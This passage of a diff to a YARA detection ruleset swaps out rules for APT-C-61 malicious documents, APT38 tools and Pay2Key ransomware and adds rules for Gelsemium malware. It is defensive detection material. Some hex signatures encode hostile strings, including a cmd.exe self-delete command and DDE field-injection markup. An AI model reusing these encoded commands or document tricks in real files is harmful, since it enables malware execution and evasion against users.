00 4c 89 65 b8 66 44 89 65 a8 48 83 7d 00 08 72 0a 48 8b 4d e8 ff 15 2e 2f 06 00 48 c7 45 00 07 00 00 00 4c 89 65 f8 66 44 89 65 e8 48 8d 85 98 04 00 00 48 89 85 c0 00 00 00 48 8d 85 88 04 00 00 48 89 85 c8 00 00 00 48 8b 9d b8 04 00 00 48 8b bd c0 04 00 00 48 3b df 0f 84 8b 02 00 00 66 90 4c 89 a5 48 05 00 00 4c 89 a5 50 05 00 00 48 c7 45 30 07 00 00 00 4c 89 65 28 66 44 89 65 18 4c 8d 85 50 04 00 00 48 83 bd 68 04 00 00 08 4c 0f 43 85 50 04 00 00 48 8d 95 50 04 00 00 48 0f 43 95 50 04 00 00 48 8b 85 60 04 00 00 4d 8d 04 40 48 8d 4d 18 e8 37 b4 01 00 90 48 8d 55 18 48 8d 8d 48 05 00 00 e8 36 9a 00 00 90 48 83 7d 30 }
-		$s2 = { 48 c7 85 b0 04 00 00 07 00 00 00 4c 89 a5 a8 04 00 00 66 44 89 a5 98 04 00 00 4c 8b 85 88 04 00 00 4d 8b c8 4d 8b 00 48 8d 95 28 02 00 00 48 8d 8d 88 04 00 00 e8 d1 fe 00 00 48 8b 8d 88 04 00 00 ff 15 5c 28 06 00 48 c7 45 e0 0f 00 00 00 4c 89 65 d8 c6 45 c8 00 41 b8 0e 00 00 00 48 8d 15 b7 db 08 00 48 8d 4d c8 e8 ee d0 00 00 90 48 8d 4d c8 e8 54 8c 01 00 48 8b d8 48 83 7d e0 10 72 0a 48 8b 4d c8 ff 15 18 28 06 00 48 c7 45 e0 0f 00 00 00 4c 89 65 d8 c6 45 c8 00 48 }
-		$s3 = { 48 8d 8d a8 02 00 00 e8 88 64 01 00 90 48 8b 08 48 89 4c 24 38 48 8b 48 08 48 89 4c 24 40 4c 89 20 4c 89 60 08 48 8d 54 24 38 48 8d 4c 24 48 e8 a0 8e 01 00 90 48 c7 45 a0 07 00 00 00 4c 89 65 98 66 44 89 65 88 41 b8 0b 00 00 00 48 8d 15 d9 d3 08 00 48 8d 4d 88 e8 a8 a5 00 00 90 48 8d 54 24 48 48 8d 4d 88 e8 d9 60 00 00 90 48 83 7d a0 08 72 0a 48 8b 4d 88 ff 15 7f 27 06 00 48 c7 45 a0 07 00 00 00 4c 89 65 98 66 44 89 65 88 48 8b 4c 24 48 48 85 c9 74 0b 48 8b 01 ba 01 00 00 00 ff 10 90 48 8b 4c 24 40 }
-		$s4 = { 48 83 7c 24 58 08 72 0b 48 8b 4c 24 40 ff 15 85 df 06 00 49 8b ce e8 05 dd ff ff e8 e0 db ff ff 48 8d 78 30 e8 27 fc ff ff 33 f6 84 c0 0f 85 ae 01 00 00 48 c7 44 24 38 07 00 00 00 48 89 74 24 30 66 89 74 24 20 44 8d 46 07 48 8d 15 cf 84 09 00 48 8d 4c 24 20 e8 45 5d 01 00 90 48 c7 44 24 58 07 00 00 00 48 89 74 24 50 66 89 74 24 40 44 8d 46 07 48 8d 15 a6 84 09 00 48 8d 4c 24 40 e8 1c 5d 01 00 90 48 8d 54 24 20 48 8b cf e8 5e 24 01 00 48 8b d8 48 8d 54 24 40 48 8d 4d 18 e8 4d 24 01 00 48 8b c8 48 8b d3 e8 72 c1 ff ff 85 c0 0f 9e c3 48 83 7c 24 58 08 72 0b 48 8b 4c 24 40 ff 15 d2 de 06 00 48 c7 44 24 58 07 00 00 00 48 89 74 24 50 66 89 74 24 40 48 83 7c 24 38 08 72 0b 48 8b 4c 24 20 ff 15 ac de 06 00 84 db 0f 84 ed 00 00 00 48 c7 44 24 38 07 00 00 00 48 89 74 24 30 66 89 74 24 20 41 b8 20 00 00 00 48 8d 15 ec 84 09 00 48 8d 4c 24 20 e8 82 5c 01 00 90 48 8d 05 3a aa 09 00 48 89 44 24 40 48 c7 44 24 60 07 00 00 00 48 89 74 24 58 66 89 74 24 48 49 83 c9 ff 45 33 c0 48 8d 54 24 20 48 8d 4c 24 48 e8 0c 5b 01 00 90 48 8d 05 e4 a8 09 00 48 89 45 80 48 8d 4d 88 ff 15 76 de 06 00 48 8d 05 ff e7 06 00 48 89 45 a0 48 89 75 a8 48 89 75 b0 48 89 75 b8 c7 45 c0 ff ff ff ff 48 8b 45 80 48 63 48 04 48 8d 05 71 9a 09 00 48 89 44 0d 80 48 8b 45 80 48 63 48 08 48 8d 05 bd ac 09 00 48 89 44 0d 80 48 8d 54 24 40 48 8d 4d 80 e8 a2 e0 02 00 48 8b d0 41 b8 01 00 00 00 48 8d 4d d0 e8 e0 05 00 00 48 8d 15 81 f8 0b 00 48 8d 4d d0 e8 a2 46 06 00 90 48 c7 44 24 38 07 00 00 00 48 89 74 24 30 66 89 74 24 20 41 b8 0b 00 00 00 48 8d 15 67 83 09 00 48 8d 4c 24 20 e8 95 5b 01 00 90 48 8d 54 24 20 49 8b cd e8 d7 22 01 00 49 3b c4 74 13 49 83 c9 ff 45 33 c0 49 8b d4 48 8b c8 e8 30 5a 01 00 90 48 83 7c 24 38 08 72 0b 48 8b 4c 24 20 ff 15 54 dd 06 00 48 c7 44 24 38 07 00 00 00 48 89 74 24 30 66 89 74 24 20 41 b8 07 00 00 00 48 8d 15 bc 82 09 00 48 8d 4c 24 20 e8 32 5b 01 00 90 48 c7 44 24 58 07 00 00 00 48 89 74 24 50 66 89 74 24 40 41 b8 07 00 00 00 48 8d 15 91 82 09 00 48 8d 4c 24 40 e8 07 5b 01 00 90 48 8d 54 24 20 48 8d 4d 18 e8 48 22 01 00 48 8b d8 48 8d 54 24 40 48 8b cf e8 38 22 01 00 48 3b c3 74 13 49 83 c9 ff 45 33 c0 48 8b d3 48 8b c8 e8 91 59 01 00 90 48 83 7c 24 58 08 72 0b 48 8b 4c 24 40 ff 15 b5 dc 06 00 48 c7 44 24 58 07 00 00 00 48 89 74 24 50 66 89 74 24 40 }
-
-	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 300KB and 3 of ( $s* )
-}
 rule ARKBIRD_SOLG_APT_Gelsemium_Gelsemine_June_2021_1 : FILE
 {
 	meta:
@@ -150471,218 +151197,136 @@ rule ARKBIRD_SOLG_APT_Gelsemium_Gelsemine_June_2021_1 : FILE
 	condition:
 		uint16( 0 ) == 0x5a4d and filesize > 150KB and all of ( $s* )
 }
-rule ARKBIRD_SOLG_APT_APT_C_61_Dec_2021_1 : FILE
+rule ARKBIRD_SOLG_APT_Gelsemium_Gelsevirine_June_2021_1 : FILE
 {
 	meta:
-		description = "Detect similiar structures used in the APT-C-61 maldocs"
+		description = "Detect Gelsevirine malware (Main Plug-in)"
 		author = "Arkbird_SOLG"
-		id = "48054d32-6613-5a54-b19c-8e9b8f747c14"
-		date = "2021-12-13"
-		modified = "2021-12-14"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-12-13/APT_APT_C_61_Dec_2021_1.yara#L1-L20"
+		id = "31900186-2531-5558-aafb-67707040ddaf"
+		date = "2021-06-12"
+		modified = "2021-06-14"
+		reference = "https://www.welivesecurity.com/wp-content/uploads/2021/06/eset_gelsemium.pdf"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-13/Gelsemium/APT_Gelsemium_Gelsevirine_June_2021_1.yara#L1-L18"
 		license_url = "N/A"
-		logic_hash = "be742a0ebc53f09872d5231cf367bb1e3ae04c1a70ce94610b6597e426eeb389"
+		logic_hash = "06e7ee49092621c8469eeb1cd9e5cc1420a1879084e0d0a39181dc046bfa00cf"
 		score = 75
-		quality = 69
+		quality = 75
 		tags = "FILE"
-		hash1 = "2cc0f8a85df2b2b0dd4c6942125bf82e647e9ac7bb91467ac5c480cf5e1dd4ff"
-		hash2 = "193c921f7ab12c0066014ffad37a98ee57ecd5101dae2ddeb5e39200eb704431"
-		hash3 = "4ec021cc3dbb2b0de7313e41063026e3ef4777baf4dec2bdad7cd2d515bf0fe2"
+		hash1 = "1a9d78e5c255de239fb18b2cf47c4c2298f047073299c27fb54a0edf08a1d5a1"
+		hash1 = "51b9296ff1f562350cd63abd22c6032ef26d5ae6a3e2e5e0f851d8b1a5d0ee35"
 		tlp = "white"
-		adversary = "APT-C-61"
-
-	strings:
-		$s1 = { 3e 3c 77 3a 69 6e 73 74 72 54 65 78 74 3e 53 45 54 20 [1-4] 3c 2f 77 3a 69 6e 73 74 72 54 65 78 74 3e }
-		$s2 = { 3c 2f 77 3a 72 3e 3c 77 3a 66 6c 64 53 69 6d 70 6c 65 20 77 3a 69 6e 73 74 72 3d 22 20 20 51 55 4f 54 45 20 20 }
-		$s3 = { 3c 77 3a 69 6e 73 74 72 54 65 78 74 20 78 6d 6c 3a 73 70 61 63 65 3d 22 70 72 65 73 65 72 76 65 22 3e 20 3c 2f 77 3a 69 6e 73 74 72 54 65 78 74 3e }
-		$s4 = { 3c 77 3a 72 3e 3c 77 3a 69 6e 73 74 72 54 65 78 74 20 78 6d 6c 3a 73 70 61 63 65 3d 22 70 72 65 73 65 72 76 65 22 3e 20 44 44 45 3c 2f 77 3a 69 6e 73 74 72 54 65 78 74 3e 3c 2f 77 3a 72 3e }
-
-	condition:
-		uint16( 0 ) == 0x4b50 and filesize > 20KB and all of ( $s* )
-}
-rule ARKBIRD_SOLG_APT_APT38_Valeforbeta_Mar_2021_1 : FILE
-{
-	meta:
-		description = "Detect ValeforBeta used in attacks against Japanese organisations by APT38"
-		author = "Arkbird_SOLG"
-		id = "74a20725-3e52-5fef-9934-c812137dc989"
-		date = "2021-03-23"
-		modified = "2021-03-24"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-23/APT38/APT_APT38_ValeforBeta_Mar_2021_1.yar#L1-L22"
-		license_url = "N/A"
-		logic_hash = "0ee8202b8978bf487df2a63c17d139076f2e9f68f1827a17929522060a72937a"
-		score = 50
-		quality = 67
-		tags = "FILE"
-		hash1 = "eb846bb491bea698b99eab80d58fd1f2530b0c1ee5588f7ea02ce0ce209ddb60"
-		level = "experimental"
-
-	strings:
-		$dbg1 = { 2f 64 64 65 00 00 00 64 64 65 65 78 65 63 }
-		$dbg2 = { 25 73 5c 53 68 65 6c 6c 4e 65 77 }
-		$dbg3 = { 25 73 20 28 25 73 3a 25 64 29 0a 25 73 }
-		$dbg4 = { 7b 25 30 38 58 2d 25 30 34 58 2d 25 30 34 58 2d 25 30 32 58 25 30 32 58 2d 25 30 32 58 25 30 32 58 25 30 32 58 25 30 32 58 25 30 32 58 25 30 32 58 7d }
-		$dbg5 = { 25 73 25 73 2e 64 6c 6c }
-		$dbg6 = { 25 73 5c 73 68 65 6c 6c 5c 6f 70 65 6e 5c 25 73 00 00 00 00 25 73 5c 73 68 65 6c 6c 5c 70 72 69 6e 74 5c 25 73 00 00 00 25 73 5c 73 68 65 6c 6c 5c 70 72 69 6e 74 74 6f 5c 25 73 00 25 73 5c 44 65 66 61 75 6c 74 49 63 6f 6e 00 00 25 73 5c 53 68 65 6c 6c 4e 65 77 00 2c 25 64 00 63 6f 6d 6d 61 6e 64 00 20 22 25 31 22 00 00 00 20 2f 70 20 22 25 31 22 00 00 00 00 20 2f 70 74 20 22 25 31 22 20 22 25 32 22 20 22 25 33 22 20 22 25 34 22 }
-		$dbg7 = { 43 4c 53 49 44 5c 25 31 5c 49 6e 50 72 6f 63 53 65 72 76 65 72 33 32 }
-		$s1 = { 74 f1 ff b5 a8 fe ff ff 8d 4b 10 c7 43 08 03 00 00 00 e8 3c cf fd ff eb da 8d 8d ac fe ff ff e8 3f 1a fc ff 83 65 fc 00 8d 85 ac fe ff ff 50 57 e8 bd fd ff ff ff b5 ac fe ff ff ff 15 24 44 47 00 85 c0 0f 85 be 00 00 00 50 50 8d 8d a0 fe ff ff 51 8d 8d 9c fe ff ff 51 50 50 50 ff b5 ac fe ff ff ff 15 70 42 47 00 85 c0 75 1f ff b5 a8 fe ff ff 53 e8 dc fe ff ff 8b 8d ac fe ff ff }
-		$s2 = { 45 fc 8b 45 0c 0f b6 48 0f 56 51 0f b6 48 0e 51 0f b6 48 0d 51 0f b6 48 0c 51 0f b6 48 0b 51 0f b6 48 0a 51 0f b6 48 09 51 0f b6 48 08 8b 75 08 83 a5 f8 fe ff ff 00 51 0f b7 48 06 51 0f b7 48 04 51 ff 30 8d 85 fc fe ff ff 68 48 aa 47 00 68 00 01 00 00 }
-
-	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 30KB and 5 of ( $dbg* ) and 1 of ( $s* )
-}
-rule ARKBIRD_SOLG_APT_APT38_Vsingle_Mar_2021_1 : FILE
-{
-	meta:
-		description = "Detect VSingle used in attacks against Japanese organisations by APT38"
-		author = "Arkbird_SOLG"
-		id = "d1d640f6-bcec-5364-8ea5-e0c0b86da6e1"
-		date = "2021-03-23"
-		modified = "2021-03-24"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-23/APT38/APT_APT38_VSingle_Mar_2021_1.yar#L1-L24"
-		license_url = "N/A"
-		logic_hash = "d01baac099ce33b837c83d6778900f7e55b8c63e75d0e552c10ababc8dec744c"
-		score = 50
-		quality = 69
-		tags = "FILE"
-		hash1 = "487c1bdb65634a794fa5e359c383c94945ce9f0806fcad46440e919ba0e6166e"
-		level = "experimental"
+		adversary = "Gelsemium"
 
 	strings:
-		$dbg1 = { 68 74 74 70 [0-1] 3a 2f 2f 25 73 25 73 }
-		$dbg2 = { 43 72 65 61 74 65 4e 61 6d 65 64 50 69 70 65 41 20 66 69 6e 69 73 68 65 64 20 77 69 74 68 20 45 72 72 6f 72 2d 25 64 }
-		$dbg3 = { 4f 53 3a 20 25 73 25 73 20 53 50 20 25 64 20 25 73 20 28 25 64 2e 25 64 2e 25 64 29 0d 0a }
-		$dbg4 = { 63 00 6d 00 64 00 2e 00 65 00 78 00 65 00 20 00 2f 00 75 00 20 00 2f 00 63 00 20 00 25 00 73 }
-		$dbg5 = { 0d 0a 43 6f 6f 6b 69 65 3a 20 25 73 }
-		$dbg6 = { 25 73 5f 6d 61 69 6e }
-		$dbg7 = { 25 73 5f 66 69 6e }
-		$dbg8 = "3%3*373<3I3N3[3`3m3r3" fullword ascii
-		$s1 = { 8b 8d 80 f8 ff ff c7 41 04 01 00 00 00 83 e8 01 0f 84 aa 12 00 00 83 e8 01 0f 84 9a 12 00 00 83 e8 01 0f 84 8a 12 00 00 83 e8 01 0f 84 7a 12 00 }
-		$s2 = { 51 83 7d 08 00 75 07 b8 5b ab 66 00 eb 35 8b 45 08 89 45 fc 8b 4d fc }
+		$s1 = { 48 8b c4 55 41 56 41 57 48 8d a8 38 fa ff ff 48 81 ec b0 06 00 00 48 c7 85 a0 02 00 00 fe ff ff ff 48 89 58 08 48 89 70 10 48 89 78 18 4c 89 60 20 48 8b 05 68 bf 0b 00 48 33 c4 48 89 85 a0 05 00 00 45 33 e4 4c 89 65 08 4c 89 65 10 44 89 64 24 20 48 8d 54 24 20 48 8d 4d 08 e8 30 96 01 00 90 48 c7 85 f8 00 00 00 07 00 00 00 4c 89 a5 f0 00 00 00 66 44 89 a5 e0 00 00 00 45 8d 44 24 04 48 8d 15 79 d8 08 00 48 8d 8d e0 00 00 00 e8 dd b0 00 00 90 48 8d 8d e0 00 00 00 e8 50 30 ff ff 90 48 83 bd f8 00 00 00 08 72 0d 48 8b 8d e0 00 00 00 ff 15 b0 32 06 00 48 c7 85 b8 01 00 00 07 00 00 00 4c 89 a5 b0 01 00 00 66 44 89 a5 a0 01 00 00 41 b8 10 00 00 00 48 8d 15 61 d6 08 00 48 8d 8d a0 01 00 00 e8 85 b0 00 00 90 48 8d 95 a0 01 00 00 48 8d 8d 80 05 00 00 e8 41 96 01 00 90 48 83 bd b8 01 00 00 08 72 0d 48 8b 8d a0 01 00 00 ff 15 51 32 06 00 48 c7 85 68 04 00 00 07 00 00 00 4c 89 a5 60 04 00 00 66 44 89 a5 50 04 00 00 48 c7 85 78 01 00 00 07 00 00 00 4c 89 a5 70 01 00 00 66 44 89 a5 60 01 00 00 49 83 ce ff 4d 8b ce 45 33 c0 48 8d 95 80 05 00 00 48 8d 8d 60 01 00 00 e8 c8 ae 00 00 90 48 8d 95 60 01 00 00 48 8d 8d e0 01 00 00 e8 e4 5b ff ff 90 48 8d 8d 50 04 00 00 48 3b c8 74 15 4d 8b ce 45 33 c0 48 8b d0 48 8d 8d 50 04 00 00 e8 92 ae 00 00 48 8d 8d 50 04 00 00 e8 b6 11 ff ff 90 48 83 bd f8 01 00 00 08 72 0d 48 8b 8d e0 01 00 00 ff 15 a6 31 06 00 48 c7 85 f8 01 00 00 07 00 00 00 4c 89 a5 f0 01 00 00 66 44 89 a5 e0 01 00 00 48 83 bd 78 01 00 00 08 72 0d 48 8b 8d 60 01 00 00 ff 15 75 31 06 00 33 d2 48 8d 8d 50 04 00 00 e8 5f 2b 04 00 48 c7 85 58 01 00 00 07 00 00 00 4c 89 a5 50 01 00 00 66 44 89 a5 40 01 00 00 41 b8 0d 00 00 00 48 8d 15 b8 e2 08 00 48 8d 8d 40 01 00 00 e8 3c af 00 00 90 e8 96 2d ff ff 48 8d 48 30 48 8d 95 40 01 00 00 e8 b6 77 00 00 48 8b c8 e8 fe dc 02 00 48 8b c8 e8 16 d5 ff ff 90 48 83 bd 58 01 00 00 08 72 0d 48 8b 8d 40 01 00 00 ff 15 f6 30 06 00 48 c7 85 18 01 00 00 07 00 00 00 4c 89 a5 10 01 00 00 66 44 89 a5 00 01 00 00 41 b8 24 00 00 00 48 8d 15 d7 e3 08 00 48 8d 8d 00 01 00 00 e8 cb ae 00 00 90 48 8d 8d 00 01 00 00 e8 ce 6b 00 00 84 c0 0f 94 c3 48 83 bd 18 01 00 00 08 72 0d 48 8b 8d 00 01 00 00 ff 15 9a 30 06 00 84 db 0f 84 36 08 00 00 4c 89 a5 88 04 00 00 4c 89 a5 90 04 00 00 e8 f7 3b 01 00 48 89 85 88 04 00 00 48 c7 45 50 07 00 00 00 4c 89 65 48 66 44 89 65 38 41 b8 0b 00 00 00 48 8d 15 2a d6 08 00 48 8d 4d 38 e8 59 ae 00 00 90 e8 b3 2c ff ff 48 8d 48 30 48 8d 55 38 e8 96 75 00 00 48 c7 85 b0 04 00 00 07 00 00 00 4c 89 a5 a8 04 00 00 66 44 89 a5 98 04 00 00 4d 8b ce 45 33 c0 48 8b d0 48 8d 8d 98 04 00 00 e8 d7 ac 00 00 90 48 83 7d 50 08 72 0a 48 8b 4d 38 ff 15 fd 2f 06 00 48 c7 45 50 07 00 00 00 4c 89 65 48 66 44 89 65 38 4c 89 a5 b8 04 00 00 4c 89 a5 c0 04 00 00 4c 89 a5 c8 04 00 00 48 c7 45 00 07 00 00 00 4c 89 65 f8 66 44 89 65 e8 41 b8 01 00 00 00 48 8d 15 0d e3 08 00 48 8d 4d e8 e8 b8 ad 00 00 90 48 c7 45 c0 07 00 00 00 4c 89 65 b8 66 44 89 65 a8 41 b8 0d 00 00 00 48 8d 15 e9 e2 08 00 48 8d 4d a8 e8 90 ad 00 00 90 e8 ea 2b ff ff 48 8d 48 30 48 8d 55 a8 e8 cd 74 00 00 48 8b d0 4c 8d 45 e8 48 8d 8d b8 04 00 00 e8 1a 55 01 00 90 48 83 7d c0 08 72 0a 48 8b 4d a8 ff 15 50 2f 06 00 48 c7 45 c0 07 00 00 00 4c 89 65 b8 66 44 89 65 a8 48 83 7d 00 08 72 0a 48 8b 4d e8 ff 15 2e 2f 06 00 48 c7 45 00 07 00 00 00 4c 89 65 f8 66 44 89 65 e8 48 8d 85 98 04 00 00 48 89 85 c0 00 00 00 48 8d 85 88 04 00 00 48 89 85 c8 00 00 00 48 8b 9d b8 04 00 00 48 8b bd c0 04 00 00 48 3b df 0f 84 8b 02 00 00 66 90 4c 89 a5 48 05 00 00 4c 89 a5 50 05 00 00 48 c7 45 30 07 00 00 00 4c 89 65 28 66 44 89 65 18 4c 8d 85 50 04 00 00 48 83 bd 68 04 00 00 08 4c 0f 43 85 50 04 00 00 48 8d 95 50 04 00 00 48 0f 43 95 50 04 00 00 48 8b 85 60 04 00 00 4d 8d 04 40 48 8d 4d 18 e8 37 b4 01 00 90 48 8d 55 18 48 8d 8d 48 05 00 00 e8 36 9a 00 00 90 48 83 7d 30 }
+		$s2 = { 48 c7 85 b0 04 00 00 07 00 00 00 4c 89 a5 a8 04 00 00 66 44 89 a5 98 04 00 00 4c 8b 85 88 04 00 00 4d 8b c8 4d 8b 00 48 8d 95 28 02 00 00 48 8d 8d 88 04 00 00 e8 d1 fe 00 00 48 8b 8d 88 04 00 00 ff 15 5c 28 06 00 48 c7 45 e0 0f 00 00 00 4c 89 65 d8 c6 45 c8 00 41 b8 0e 00 00 00 48 8d 15 b7 db 08 00 48 8d 4d c8 e8 ee d0 00 00 90 48 8d 4d c8 e8 54 8c 01 00 48 8b d8 48 83 7d e0 10 72 0a 48 8b 4d c8 ff 15 18 28 06 00 48 c7 45 e0 0f 00 00 00 4c 89 65 d8 c6 45 c8 00 48 }
+		$s3 = { 48 8d 8d a8 02 00 00 e8 88 64 01 00 90 48 8b 08 48 89 4c 24 38 48 8b 48 08 48 89 4c 24 40 4c 89 20 4c 89 60 08 48 8d 54 24 38 48 8d 4c 24 48 e8 a0 8e 01 00 90 48 c7 45 a0 07 00 00 00 4c 89 65 98 66 44 89 65 88 41 b8 0b 00 00 00 48 8d 15 d9 d3 08 00 48 8d 4d 88 e8 a8 a5 00 00 90 48 8d 54 24 48 48 8d 4d 88 e8 d9 60 00 00 90 48 83 7d a0 08 72 0a 48 8b 4d 88 ff 15 7f 27 06 00 48 c7 45 a0 07 00 00 00 4c 89 65 98 66 44 89 65 88 48 8b 4c 24 48 48 85 c9 74 0b 48 8b 01 ba 01 00 00 00 ff 10 90 48 8b 4c 24 40 }
+		$s4 = { 48 83 7c 24 58 08 72 0b 48 8b 4c 24 40 ff 15 85 df 06 00 49 8b ce e8 05 dd ff ff e8 e0 db ff ff 48 8d 78 30 e8 27 fc ff ff 33 f6 84 c0 0f 85 ae 01 00 00 48 c7 44 24 38 07 00 00 00 48 89 74 24 30 66 89 74 24 20 44 8d 46 07 48 8d 15 cf 84 09 00 48 8d 4c 24 20 e8 45 5d 01 00 90 48 c7 44 24 58 07 00 00 00 48 89 74 24 50 66 89 74 24 40 44 8d 46 07 48 8d 15 a6 84 09 00 48 8d 4c 24 40 e8 1c 5d 01 00 90 48 8d 54 24 20 48 8b cf e8 5e 24 01 00 48 8b d8 48 8d 54 24 40 48 8d 4d 18 e8 4d 24 01 00 48 8b c8 48 8b d3 e8 72 c1 ff ff 85 c0 0f 9e c3 48 83 7c 24 58 08 72 0b 48 8b 4c 24 40 ff 15 d2 de 06 00 48 c7 44 24 58 07 00 00 00 48 89 74 24 50 66 89 74 24 40 48 83 7c 24 38 08 72 0b 48 8b 4c 24 20 ff 15 ac de 06 00 84 db 0f 84 ed 00 00 00 48 c7 44 24 38 07 00 00 00 48 89 74 24 30 66 89 74 24 20 41 b8 20 00 00 00 48 8d 15 ec 84 09 00 48 8d 4c 24 20 e8 82 5c 01 00 90 48 8d 05 3a aa 09 00 48 89 44 24 40 48 c7 44 24 60 07 00 00 00 48 89 74 24 58 66 89 74 24 48 49 83 c9 ff 45 33 c0 48 8d 54 24 20 48 8d 4c 24 48 e8 0c 5b 01 00 90 48 8d 05 e4 a8 09 00 48 89 45 80 48 8d 4d 88 ff 15 76 de 06 00 48 8d 05 ff e7 06 00 48 89 45 a0 48 89 75 a8 48 89 75 b0 48 89 75 b8 c7 45 c0 ff ff ff ff 48 8b 45 80 48 63 48 04 48 8d 05 71 9a 09 00 48 89 44 0d 80 48 8b 45 80 48 63 48 08 48 8d 05 bd ac 09 00 48 89 44 0d 80 48 8d 54 24 40 48 8d 4d 80 e8 a2 e0 02 00 48 8b d0 41 b8 01 00 00 00 48 8d 4d d0 e8 e0 05 00 00 48 8d 15 81 f8 0b 00 48 8d 4d d0 e8 a2 46 06 00 90 48 c7 44 24 38 07 00 00 00 48 89 74 24 30 66 89 74 24 20 41 b8 0b 00 00 00 48 8d 15 67 83 09 00 48 8d 4c 24 20 e8 95 5b 01 00 90 48 8d 54 24 20 49 8b cd e8 d7 22 01 00 49 3b c4 74 13 49 83 c9 ff 45 33 c0 49 8b d4 48 8b c8 e8 30 5a 01 00 90 48 83 7c 24 38 08 72 0b 48 8b 4c 24 20 ff 15 54 dd 06 00 48 c7 44 24 38 07 00 00 00 48 89 74 24 30 66 89 74 24 20 41 b8 07 00 00 00 48 8d 15 bc 82 09 00 48 8d 4c 24 20 e8 32 5b 01 00 90 48 c7 44 24 58 07 00 00 00 48 89 74 24 50 66 89 74 24 40 41 b8 07 00 00 00 48 8d 15 91 82 09 00 48 8d 4c 24 40 e8 07 5b 01 00 90 48 8d 54 24 20 48 8d 4d 18 e8 48 22 01 00 48 8b d8 48 8d 54 24 40 48 8b cf e8 38 22 01 00 48 3b c3 74 13 49 83 c9 ff 45 33 c0 48 8b d3 48 8b c8 e8 91 59 01 00 90 48 83 7c 24 58 08 72 0b 48 8b 4c 24 40 ff 15 b5 dc 06 00 48 c7 44 24 58 07 00 00 00 48 89 74 24 50 66 89 74 24 40 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 30KB and 6 of ( $dbg* ) and all of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 300KB and 3 of ( $s* )
 }
-rule ARKBIRD_SOLG_Ran_Pay2Key_Nov_2020_1 : FILE
+rule ARKBIRD_SOLG_APT_Gelsemium_Gelsenicine_June_2021_1 : FILE
 {
 	meta:
-		description = "Detect Pay2Key ransomware"
+		description = "Detect Gelsenicine malware (Loader - Variant 1)"
 		author = "Arkbird_SOLG"
-		id = "440b8128-4708-54ba-94c3-c0b522004da6"
-		date = "2020-12-01"
-		modified = "2020-12-14"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-12-14/Pay2Key/Ran_Pay2Key_Nov_2020_1.yar#L1-L31"
+		id = "36276150-a5dd-5385-9e50-958a6fa54de5"
+		date = "2021-06-12"
+		modified = "2021-06-14"
+		reference = "https://www.welivesecurity.com/wp-content/uploads/2021/06/eset_gelsemium.pdf"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-13/Gelsemium/APT_Gelsemium_Gelsenicine_June_2021_1.yara#L1-L19"
 		license_url = "N/A"
-		logic_hash = "f1ea1ed141ba7a1eaaa34c216adebfacaa23ef8776a0216b778ccb34bd000590"
+		logic_hash = "66d9fad7105b46a55db11c5224b1a395793f2dee89f779d59c80b2f7cda5a115"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "5bae961fec67565fb88c8bcd3841b7090566d8fc12ccb70436b5269456e55c00"
-		hash2 = "d2b612729d0c106cb5b0434e3d5de1a5dc9d065d276d51a3fb25a08f39e18467"
-		hash3 = "ea7ed9bb14a7bda590cf3ff81c8c37703a028c4fdb4599b6a283d68fdcb2613f"
+		hash1 = "97982e098a4538d05e78c172c9bbc5b412754df86dc73e760004f0038ec928fb"
+		hash2 = "46338cae732ee1664aac77d9dce57c4ff8666460c1a51bee49cae44c86e42df9"
+		hash3 = "f0d23aa026ae6ba96051401dc2b390ba5c968d55c2a4b31a36e45fb67dfc2e3c"
+		tlp = "white"
+		adversary = "Gelsemium"
 
 	strings:
-		$s1 = "F:\\2-Sources\\21-FinalCobalt\\Source\\cobalt\\Cobalt\\Cobalt\\Win32\\Release\\Client\\Cobalt.Client.pdb" fullword ascii
-		$s2 = ".\\Cobalt-Client-log.txt" fullword ascii
-		$s3 = ".\\Config.ini" fullword wide
-		$s4 = "Local\\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flag" fullword ascii
-		$s5 = "\\Microsoft\\Windows\\Themes\\TranscodedWallpaper" fullword ascii
-		$s6 = { 40 00 63 00 6d 00 64 00 2e 00 65 00 78 00 65 00 20 00 2f 00 43 00 20 00 70 00 69 00 6e 00 67 00 20 00 31 00 2e 00 31 00 2e 00 31 00 2e 00 31 00 20 00 2d 00 6e 00 20 00 31 00 20 00 2d 00 77 00 20 00 33 00 30 00 30 00 30 00 20 00 3e 00 20 00 4e 00 75 00 6c 00 20 00 26 00 20 00 44 00 65 00 6c 00 20 00 2f 00 66 00 20 00 2f 00 71 00 20 00 22 00 25 00 73 00 22 }
-		$s7 = "%WINDRIVE%" fullword wide
-		$s8 = "%WINDIR%" fullword wide
-		$dbg1 = "message.txt" fullword ascii
-		$dbg2 = "Failed To Get Data...." fullword ascii
-		$dbg3 = "lock.locked()" fullword wide
-		$dbg4 = { 47 65 74 41 64 61 70 74 65 72 73 49 6e 66 6f 20 66 61 69 6c 65 64 20 77 69 74 68 20 65 72 72 6f 72 3a 20 25 64 0a }
-		$dbg5 = { 43 72 79 70 74 41 63 71 75 69 72 65 43 6f 6e 74 65 78 74 20 66 61 69 6c 65 64 3a 20 25 78 0a }
-		$dbg6 = { 43 72 79 70 74 44 65 72 69 76 65 4b 65 79 20 66 61 69 6c 65 64 3a 20 25 78 0a 00 00 25 00 64 }
-		$dbg7 = { 5b 2d 5d 20 43 72 79 70 74 45 6e 63 72 79 70 74 20 66 61 69 6c 65 64 0a }
